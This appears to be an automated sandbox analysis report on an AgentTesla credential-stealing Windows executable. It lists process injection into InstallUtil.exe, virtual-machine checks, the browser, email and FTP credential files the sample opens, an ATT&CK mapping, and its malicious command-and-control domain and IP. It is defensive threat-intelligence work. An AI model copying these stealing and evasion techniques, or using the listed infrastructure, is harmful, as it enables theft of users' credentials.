                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594966Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                        Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                        Source: umVoLahqZn.exe, 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q#SOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: InstallUtil.exe, 00000004.00000002.3315667697.0000000006532000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11EA008Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Users\user\Desktop\umVoLahqZn.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4588612.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45b20f2.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4659420.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4588612.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.462f142.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45dbbc2.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45dbbc2.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45b20f2.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4588612.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45b20f2.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4659420.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4588612.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.462f142.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45dbbc2.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45dbbc2.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.45b20f2.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Encrypted Channel
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        Valid Accounts
                        1
                        Valid Accounts
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        Credentials in Registry
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Access Token Manipulation
                        2
                        Obfuscated Files or Information
                        Security Account Manager111
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                        Process Injection
                        12
                        Software Packing
                        NTDS1
                        Process Discovery
                        Distributed Component Object ModelInput Capture11
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets141
                        Virtualization/Sandbox Evasion
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Valid Accounts
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                        Process Injection
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Files and Directories
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        umVoLahqZn.exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                        umVoLahqZn.exe100%AviraTR/AD.Nekark.lkpsl
                        umVoLahqZn.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://ftp.aminhacorretora.com.br100%Avira URL Cloudmalware
                        http://ns.adobe.c0/0%Avira URL Cloudsafe
                        http://aminhacorretora.com.br100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        aminhacorretora.com.br
                        162.241.203.30
                        truetrue
                          unknown
                          ftp.aminhacorretora.com.br
                          unknown
                          unknowntrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://aminhacorretora.com.brInstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://ftp.aminhacorretora.com.brInstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ns.adobe.c0/umVoLahqZn.exe, 00000000.00000002.2727525135.0000000006761000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              162.241.203.30
                              aminhacorretora.com.brUnited States
                              26337OIS1UStrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1569279
                              Start date and time:2024-12-05 17:17:00 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 9s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:umVoLahqZn.exe
                              renamed because original name is a hash value
                              Original Sample Name:325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 136
                              • Number of non-executed functions: 27
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: umVoLahqZn.exe
                              TimeTypeDescription
                              11:17:54API Interceptor202x Sleep call for process: umVoLahqZn.exe modified
                              11:19:03API Interceptor16398x Sleep call for process: InstallUtil.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              162.241.203.30S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                              • nossoplayer.me/admin/
                              RjGM2z2Z3gVHbRl.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
                              PI5102295.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
                              SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
                              ZsFMADRfZB.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
                              SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
                              SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exeGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
                              SKMB610952.jsGet hashmaliciousFormBookBrowse
                              • www.enriquepimentel.site/k056/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              aminhacorretora.com.brHangarskibenes.exeGet hashmaliciousGuLoaderBrowse
                              • 162.241.203.30
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              OIS1UStTXQS6DONV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              dY1ZxYJOz7.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              i9QKJCpVZJ.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 162.241.203.30
                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                              • 192.185.147.100
                              Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 192.185.147.100
                              https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627Get hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrmGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                              • 162.241.71.126
                              Isabella County Emergency Management-protected.pdfGet hashmaliciousUnknownBrowse
                              • 162.241.71.126
                              No context
                              No context
                              Process:C:\Users\user\Desktop\umVoLahqZn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
                              MD5:8275047EA04782E18195CE5F2F076225
                              SHA1:86FE553781E50EE2493A6D54A2F329FF94AD0DEE
                              SHA-256:302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
                              SHA-512:4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
                              Malicious:true
                              Reputation:moderate, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8439810553697228
                              Encrypted:false
                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
